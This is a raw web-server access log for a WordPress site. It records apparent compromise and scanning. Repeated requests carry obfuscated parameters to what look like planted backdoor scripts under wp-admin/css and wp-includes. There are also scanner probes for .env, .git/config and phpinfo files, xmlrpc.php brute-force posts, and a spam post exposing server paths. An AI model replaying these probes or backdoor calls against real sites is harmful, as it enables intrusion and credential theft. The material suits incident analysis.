142.4.205.1 - - [16/Oct/2025:18:58:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393039372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353439372q3730373863396133326535333834376366626666356138323932326264396266222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
178.33.43.96 - - [16/Oct/2025:18:59:16 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:18:58:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393131372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353531372q6232363134646364393238353139336464323030353030393965623664393964222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:18:59:43 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Iron/11.0.700.2 Chrome/11.0.700.2 Safari/534.24"
178.33.43.96 - - [16/Oct/2025:18:59:45 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:18:58:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393133372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353533372q3534356364326530373533346563373235383565653361656430396539643739222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
185.177.72.30 - - [16/Oct/2025:19:00:02 -0400] "GET / HTTP/1.0" 302 4406 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:03 -0400] "GET /login.php HTTP/1.0" 200 6336 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:03 -0400] "GET /js/horde.js?v=29a470be3053bf6de73a73bcbf83a243 HTTP/1.0" 200 6499 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:04 -0400] "GET /js/prototype.js?v=29a470be3053bf6de73a73bcbf83a243 HTTP/1.0" 200 50445 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:05 -0400] "GET /js/accesskeys.js?v=29a470be3053bf6de73a73bcbf83a243 HTTP/1.0" 200 5223 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:06 -0400] "GET /imp/js/login.js?v=2eacd546b0664eef136f9d417bce9327 HTTP/1.0" 200 4497 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:06 -0400] "GET /js/login.js?v=29a470be3053bf6de73a73bcbf83a243 HTTP/1.0" 200 9004 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:07 -0400] "GET /.git/config HTTP/1.0" 404 4341 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /.env HTTP/1.0" 404 4341 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /api/.env HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /config/.env HTTP/1.0" 404 4309 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /.env.example HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /.env.production HTTP/1.0" 404 4309 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /.env.dev HTTP/1.0" 404 4309 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /backend/.env HTTP/1.0" 404 4341 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:08 -0400] "GET /.env.backup HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:09 -0400] "GET /_profiler/phpinfo HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:09 -0400] "GET /phpinfo.php HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:09 -0400] "GET /phpinfo HTTP/1.0" 404 4341 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:09 -0400] "GET /info.php HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:09 -0400] "GET /test.php HTTP/1.0" 200 4520 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:10 -0400] "GET /info HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:10 -0400] "GET /php.php HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:10 -0400] "GET /i.php HTTP/1.0" 404 4341 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:10 -0400] "GET /test HTTP/1.0" 404 4325 "-" "python-httpx/0.28.1"
185.177.72.30 - - [16/Oct/2025:19:00:10 -0400] "GET /phpversion.php HTTP/1.0" 404 4341 "-" "python-httpx/0.28.1"
66.249.65.197 - - [16/Oct/2025:19:00:13 -0400] "GET /market/48361952.htm HTTP/1.0" 200 24630 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.138.172 - - [16/Oct/2025:19:00:15 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/tag-cloud HTTP/1.0" 200 7334 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
178.33.43.96 - - [16/Oct/2025:19:00:15 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:18:59:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393135372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353535372q3861643263663139626230383335646531323961356161333764326533643238222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:59:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393137372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353537372q3535363264306137336233356333613362626232646365363935656266353335222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:18:59:23 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAGW; .NET4.0C; Lunascape 6.5.8.24780)"
142.4.205.1 - - [16/Oct/2025:18:59:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393139372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353539372q6536333838666639656464626539366262616633633662666238323434373561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:00:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393231372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353631372q3834346261393839326231356437666465643266626335373366356361323863222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.131.235 - - [16/Oct/2025:19:01:35 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/post-title HTTP/1.0" 200 7199 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:00:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393233372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353633372q3164373762633737653233343566656661356261636338343535333838663336222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:00:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393235372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353635372q3633353031326565636638623932333362346635343866363635623364636366222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:01:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393237372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353637372q3066326538393561316334376530353534313962393638303461626635326563222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:00:55 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:01:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393239372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353639372q3837356530653632636563306632373038363734643666656164376466333434222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:19:02:38 -0400] "GET /?_g=1106993 HTTP/1.0" 200 24324 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:01:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393331372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353731372q3537626363653031353938343433303661633334376164663739386139656136222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:19:02:59 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/missing/missing HTTP/1.0" 200 7106 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/missing" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.65.196 - - [16/Oct/2025:19:03:07 -0400] "GET /?_g=2260528 HTTP/1.0" 200 24582 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:02:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393333372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353733372q3735303732636563643265306438646130363734653361373461626139366133222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:19:03:28 -0400] "GET /?_g=2029794 HTTP/1.0" 200 24159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:02:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393335372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353735372q3731303962626636396264386531626232633037393333323565623861316434222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:02:23 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:02:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393337372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353737372q3866356164303066613066663335396131363964646439346130333734633766222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:03:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393339372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353739372q6365636436623735333639663332333763666133303630626439336232313534222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [16/Oct/2025:19:04:24 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentytwentyfour/assets HTTP/1.0" 200 7119 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentytwentyfour" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:03:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393431372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353831372q3436613563623764343134646364633766386534353563323337616436376232222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
45.227.253.15 - - [16/Oct/2025:19:04:43 -0400] "GET /?ARRAY=7o2230223n313736303635393732372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q78696164616r5s72616r645s7061746826743q313736303635363132372q3934303537613562646335646163336462633466356438646461383030666265222p2232223n223234386563313266366338656637323861313866363731666235353761636435222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p2262696r675s70617373223n2231322q35302q35342q36362q37362q38362q3132227q HTTP/1.0" 200 4511 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761"
66.249.65.195 - - [16/Oct/2025:19:04:46 -0400] "GET /?_g=1829838 HTTP/1.0" 200 25530 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:03:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393433372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353833372q3934666136616632373430656533306638656364323733393262363137303661222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:19:04:58 -0400] "GET /?_g=1727284 HTTP/1.0" 200 24365 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:04:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393435372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353835372q3535333730313233366365353532313130613731616638313633613231323365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:03:52 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:04:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393437372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353837372q3561306630303238346665613863303535646430623966316532376161393631222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.128.196 - - [16/Oct/2025:19:05:50 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentysixteen HTTP/1.0" 200 7992 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:04:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393439372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353839372q6631323731663261313363346164333062346565386131646638633962653938222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:05:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393531372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353931372q3137643034306632393336376138643936666336616165316161373138646262222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.67 - - [16/Oct/2025:19:06:28 -0400] "GET /market/2274490762.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:19:05:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393533372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353933372q6263363530303964303062653630303762313533343434663432633337383937222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.21.62.83 - - [16/Oct/2025:19:06:42 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99"
69.197.179.242 - - [16/Oct/2025:19:05:21 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:05:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393535372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353935372q3832636233666532386138616665613233366465303436343461383565653130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
65.21.62.83 - - [16/Oct/2025:19:06:59 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99"
114.119.145.188 - - [16/Oct/2025:19:07:11 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/izo HTTP/1.0" 200 8042 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:06:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393537372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353937372q3063336431376333613535646334343334663831363632336439383564346365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
